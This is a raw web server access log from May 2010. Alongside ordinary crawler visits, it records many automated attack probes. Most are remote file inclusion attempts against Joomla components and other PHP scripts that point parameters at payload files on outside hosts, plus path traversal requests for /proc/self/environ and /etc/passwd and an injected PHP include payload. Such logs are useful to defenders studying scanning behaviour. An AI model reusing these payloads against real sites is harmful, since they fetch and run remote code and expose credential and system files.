61.67.201.187 - - [15/May/2010:02:31:49 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
87.250.255.243 - - [15/May/2010:02:31:50 -0500] "GET /logs/access_log.1236470400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
61.67.201.187 - - [15/May/2010:02:32:56 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:33:12 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:02:33:27 -0500] "GET /logs/access_log.1273276800%20%20/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://francophonie.utm.md/id1.txt?? HTTP/1.1" 404 466 "-""Mozilla/5.0"
207.46.13.131 - - [15/May/2010:02:33:39 -0500] "GET /logs/access_log.1166572800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
183.96.214.171 - - [15/May/2010:02:36:31 -0500] "GET /logs/view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:02:36:31 -0500] "GET /view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
183.96.214.171 - - [15/May/2010:02:36:31 -0500] "GET /logs/access_log.1265587200/view.php?dir=http://www.beijingteacher.net/test/fid1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
207.46.195.237 - - [15/May/2010:02:36:38 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
113.52.152.6 - - [15/May/2010:02:39:18 -0500] "GET /index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:02:39:18 -0500] "GET /index.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
87.250.255.243 - - [15/May/2010:02:42:00 -0500] "GET /logs/access_log.1189123200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [15/May/2010:02:51:30 -0500] "GET /logs/access_log.1214265600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.204.184 - - [15/May/2010:02:57:09 -0500] "GET /logs/access_log.1247011200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:02:58:38 -0500] "GET /logs/access_log.1266883200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [15/May/2010:03:06:40 -0500] "GET /logs/access_log.1207094400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
38.101.148.126 - - [15/May/2010:03:10:27 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:03:10:36 -0500] "GET /logs/access_log.1226707200 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
207.46.204.231 - - [15/May/2010:03:12:09 -0500] "GET /logs/access_log.1185753600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [15/May/2010:03:12:30 -0500] "GET /logs/access_log.1249862400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
38.101.148.126 - - [15/May/2010:03:13:49 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
38.101.148.126 - - [15/May/2010:03:13:56 -0500] "GET /logs/ HTTP/1.1" 200 5638 "-""Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html"
216.127.70.140 - - [15/May/2010:03:24:56 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 328 "-""Mozilla/5.0"
216.127.70.140 - - [15/May/2010:03:24:56 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 333 "-""Mozilla/5.0"
216.127.70.140 - - [15/May/2010:03:24:56 -0500] "GET /logs/access_log.1273363200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://liceum3.ru/help/sh/id1.txt???? HTTP/1.1" 404 357 "-""Mozilla/5.0"
80.65.166.74 - - [15/May/2010:03:26:12 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
87.250.255.243 - - [15/May/2010:03:26:22 -0500] "GET /logs/access_log.1223078400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.147.211.195 - - [15/May/2010:03:26:27 -0500] "GET /logs/access_log.1273276800///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 323 "-""libwww-perl/5.811"
217.147.211.195 - - [15/May/2010:03:26:27 -0500] "GET ///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 296 "-""libwww-perl/5.811"
217.147.211.195 - - [15/May/2010:03:26:28 -0500] "GET /logs///index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 301 "-""libwww-perl/5.811"
204.188.208.130 - - [15/May/2010:03:30:03 -0500] "GET /http://alandar.net/www2/lang??????????../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
88.191.94.188 - - [15/May/2010:03:31:48 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:31:48 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:31:48 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:31:50 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:31:50 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:31:50 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:13 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:14 -0500] "GET /logs/access_log.1273363200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:54 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:54 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:54 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:58 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:58 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:32:58 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.65.166.74 - - [15/May/2010:03:33:02 -0500] "GET /logs/access_log.1273190400///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
80.65.166.74 - - [15/May/2010:03:33:02 -0500] "GET ///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.831"
80.65.166.74 - - [15/May/2010:03:33:02 -0500] "GET /logs///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.831"
80.65.166.74 - - [15/May/2010:03:33:03 -0500] "GET /logs/access_log.1273363200///index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.831"
88.191.94.188 - - [15/May/2010:03:33:03 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
88.191.94.188 - - [15/May/2010:03:33:07 -0500] "GET /logs/access_log.1273363200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
207.46.195.237 - - [15/May/2010:03:35:39 -0500] "GET /logs/access_log.1257379200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
204.188.208.130 - - [15/May/2010:03:36:01 -0500] "GET /logs/access_log.1219795200/http://alandar.net/www2/lang??????????../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 339 "-""libwww-perl/5.831"
204.188.208.130 - - [15/May/2010:03:36:01 -0500] "GET /http://alandar.net/www2/lang??????????../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 312 "-""libwww-perl/5.831"
204.188.208.130 - - [15/May/2010:03:36:01 -0500] "GET /logs/http://alandar.net/www2/lang??????????../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 317 "-""libwww-perl/5.831"
87.250.255.243 - - [15/May/2010:03:39:09 -0500] "GET /costume/index1.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
61.67.201.187 - - [15/May/2010:03:40:29 -0500] "GET //components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:40:29 -0500] "GET /logs/access_log.1273190400%20%20//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:40:29 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:43 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:43 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:43 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:46 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:46 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:40:46 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
207.46.13.131 - - [15/May/2010:03:41:10 -0500] "GET /logs/access_log.1271376000 HTTP/1.1" 200 664329 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.116.103.153 - - [15/May/2010:03:41:18 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:18 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:18 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:19 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:21 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:21 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:41:21 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:06 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:06 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:06 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:12 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:12 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:12 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:13 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:13 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:13 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:14 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:14 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:14 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:15 -0500] "GET /logs/access_log.1264982400//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:15 -0500] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.116.103.153 - - [15/May/2010:03:42:15 -0500] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:43:41 -0500] "GET //components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:43:41 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:43:41 -0500] "GET /logs/access_log.1273190400%20%20//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:44:21 -0500] "GET /logs/access_log.1273190400%20%20//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:44:21 -0500] "GET //components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:44:21 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.129.245.165 - - [15/May/2010:03:44:56 -0500] "GET /logs//ashnews.php?pathtoashnews=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 301 "-""Mozilla/5.0"
174.129.245.165 - - [15/May/2010:03:44:56 -0500] "GET //ashnews.php?pathtoashnews=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
174.129.245.165 - - [15/May/2010:03:44:56 -0500] "GET /logs/access_log.1272844800%20%20//ashnews.php?pathtoashnews=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 325 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:47:57 -0500] "GET //components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:47:57 -0500] "GET /logs//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
61.67.201.187 - - [15/May/2010:03:47:57 -0500] "GET /logs/access_log.1273190400%20%20//components/com_flyspray/startdown.php?file=http://francophonie.utm.md/fx29id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
174.129.245.165 - - [15/May/2010:03:49:44 -0500] "GET /logs/access_log.1272844800//ashnews.php?pathtoashnews=http://bkd.sragenkab.go.id/image/readme.txt???? HTTP/1.1" 404 323 "-""Mozilla/5.0"
204.152.200.50 - - [15/May/2010:03:53:45 -0500] "GET /logs/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:03:53:45 -0500] "GET /microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:03:54:22 -0500] "GET /microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
87.250.255.243 - - [15/May/2010:03:56:00 -0500] "GET /logs/access_log.1213747200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
204.152.200.50 - - [15/May/2010:03:59:15 -0500] "GET /logs/access_log.1273363200/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 331 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:03:59:15 -0500] "GET /microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 304 "-""libwww-perl/5.834"
204.152.200.50 - - [15/May/2010:03:59:15 -0500] "GET /logs/microcms-include.php?microcms_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.834"
113.52.152.6 - - [15/May/2010:03:59:52 -0500] "GET /logs/access_log.1231718400/index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:03:59:52 -0500] "GET /logs/access_log.1231718400/index.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:03:59:53 -0500] "GET /index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:03:59:53 -0500] "GET /index.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:03:59:54 -0500] "GET /logs/index.php?dept=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
113.52.152.6 - - [15/May/2010:03:59:54 -0500] "GET /logs/index.php?dept=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
58.230.162.220 - - [15/May/2010:04:06:20 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:20 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:20 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:20 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:22 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:22 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:22 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:22 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:23 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:23 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:23 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:24 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:27 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:27 -0500] "GET ///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 1004 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:27 -0500] "GET /logs///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 200 5644 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:28 -0500] "GET /logs/access_log.1263772800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
58.230.162.220 - - [15/May/2010:04:06:45 -0500] "GET /logs/access_log.1265068800///?pagina=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
